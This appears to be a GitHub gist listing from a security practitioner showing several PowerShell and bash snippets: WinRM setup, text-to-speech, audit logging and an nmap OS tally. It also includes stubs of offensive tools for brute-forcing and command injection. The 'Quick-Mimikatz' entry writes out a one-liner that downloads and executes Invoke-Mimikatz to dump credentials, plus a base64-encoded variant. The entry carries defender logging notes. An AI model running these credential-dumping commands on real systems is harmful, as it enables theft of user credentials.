View Enable-PSRemoting.ps1
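function enablePSRemoting {
    <#
    .SYNOPSIS
    Turns on PowerShell remoting, sets the WinRM service to start automatically,
    and sets the WinRM client TrustedHosts list.

    .PARAMETER TrustedHosts
    Value written to WSMan:\localhost\Client\TrustedHosts. Defaults to '*' to
    keep the original behaviour. TrustedHosts is a client-side list of remote
    hosts this machine will connect to without mutual authentication, so '*'
    means credentials may be sent to any host whose identity was never verified.
    Prefer a comma-separated list of specific hosts.

    .OUTPUTS
    The WinRM win32_service object and the resulting TrustedHosts item, so the
    caller can confirm both settings.
    #>
    param(
        [string]$TrustedHosts = '*'
    )

    # ASCII hyphen instead of the en dash the original carried from copy/paste.
    Enable-PSRemoting -Force
    Set-Service WinRM -StartMode Automatic

    # Emit the service record so the start mode and state can be checked.
    Get-WmiObject -Class win32_service | Where-Object { $_.name -like "WinRM" }

    # Rooted provider path (WSMan:\...), so the write does not depend on the
    # current location inside the WSMan: drive and matches the read-back below.
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value $TrustedHosts
    Get-Item WSMan:\localhost\Client\TrustedHosts
}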
View auto-hydra.sh
#!/bin/bash | |
# | |
# @heinzarelli | |
# greg . foss [at] logrhythm . com | |
# v0.1 - May 2017 | |
# | |
function usage { | |
echo "" |
View Extract-WiFi-Creds.ps1
#====================================# | |
# Extract Wi-Fi Credentials # | |
# greg . foss @ owasp . org # | |
# v0.1 -- July, 2017 # | |
#====================================# | |
# Licensed under the MIT License | |
<# |
View say.ps1
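function say {
    <#
    .SYNOPSIS
    Speaks the given text aloud through System.Speech.

    .PARAMETER comment
    Text to speak. Defaults to $_ as visible in the caller's scope.
    #>
    param( [string]$comment = $_ )

    # Add-Type replaces the obsolete Assembly.LoadWithPartialName call.
    Add-Type -AssemblyName System.Speech
    $synth = New-Object System.Speech.Synthesis.SpeechSynthesizer
    try {
        $synth.SelectVoiceByHints('Female')
        $synth.Speak("$comment")
    }
    finally {
        # SpeechSynthesizer is IDisposable; release it even if Speak throws.
        $synth.Dispose()
    }
}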
View Quick-Mimikatz
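*NOTE - These commands pull from public GitHub repos that are not under my control, and the URLs track the `master` branch, so the content can change at any time. Make sure you trust the content (or better yet, make your own fork and pin the URL to a commit you have reviewed) prior to using!* | |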
# mimikatz [local]
# Fetches Invoke-Mimikatz.ps1 from the BC-SECURITY/Empire repository over HTTPS,
# evaluates the downloaded text in the current session with IEX, then calls
# Invoke-Mimikatz twice: once with -Command privilege::debug, once with -DumpCreds.
# NOTE(review): the URL names a branch rather than a commit, so the code that
# gets evaluated is whatever that branch holds at download time.
# Defender note: on PowerShell 5+ with script block logging enabled, the
# downloaded script text and these calls are recorded in the
# Microsoft-Windows-PowerShell/Operational log (event ID 4104), and AMSI-aware
# antimalware receives the script content before it runs.
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
#encoded-mimikatz [local] | |
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ |
View PowerShell Command Line Logging
# PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
# For detecting dangerous PowerShell Commands/Functions | |
Log Source Type: | |
MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
Add this file to your PowerShell directory to enable verbose command line audit logging | |
profile.ps1 | |
# PowerShell preference variables: when $true, command errors and exceptions
# (health) and command start/stop (lifecycle) events are written to the
# PowerShell event log.
# NOTE(review): these are set from profile.ps1, so a session started with
# -NoProfile never runs them and is not covered. Logging configured through
# Group Policy (module logging, script block logging) does not depend on the
# profile being loaded. Confirm which of the two the SIEM rules rely on.
$LogCommandHealthEvent = $true | |
$LogCommandLifeCycleEvent = $true |
View gist:70ae3df90c5a532baaf7
### Keybase proof | |
I hereby claim: | |
* I am gfoss on github. | |
* I am heinzarelli (https://keybase.io/heinzarelli) on keybase. | |
* I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E | |
To claim this, I am signing this object: |
View command injector
#!/bin/bash | |
# | |
# Command Injector v0.1 | |
# greg.foss[at]owasp.org | |
# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli | |
# dirtshell.sh => http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html | |
function usage { | |
echo "usage: -u URL" | |
echo "eg : -u \"http://site.com/index.php?cmd=\"" |
View autopeep.sh
#!/bin/bash | |
# | |
# Utilizing LaNMaSteR53's peepingtom.py script to auto-scrape web servers and send out notifications. | |
# Optimized for Kali Linux | |
# greg.foss[at]owasp.org | |
# | |
# cronjob to run this script once a week every Sunday at Midnight | |
# 0 0 * * 0 /usr/share/peepingtom/autopeep.sh | |
# prepare storage location, remove old data, and migrate existing folders |
View nmap-os-detection
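# Fast-scan OS fingerprinting sweep: keep only the per-host header and the
# "Running: " OS line from the nmap output, then tally hosts per OS family.
# [IP-RANGE] is a placeholder for the target range.
#
# Counts are taken from "Running: " lines only. The original counted every
# line in os.txt, so a "scan report" line whose hostname contained "Linux",
# "Apple" or "Windows" inflated the tally.
# Hosts for which nmap only prints "Running (JUST GUESSING): ..." do not match
# the "Running: " filter and are not counted.
sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt
echo "$(grep -c 'Running: .*Apple' os.txt) OS X devices"
echo "$(grep -c 'Running: .*Linux' os.txt) Linux devices"
echo "$(grep -c 'Running: .*Windows' os.txt) Windows devices"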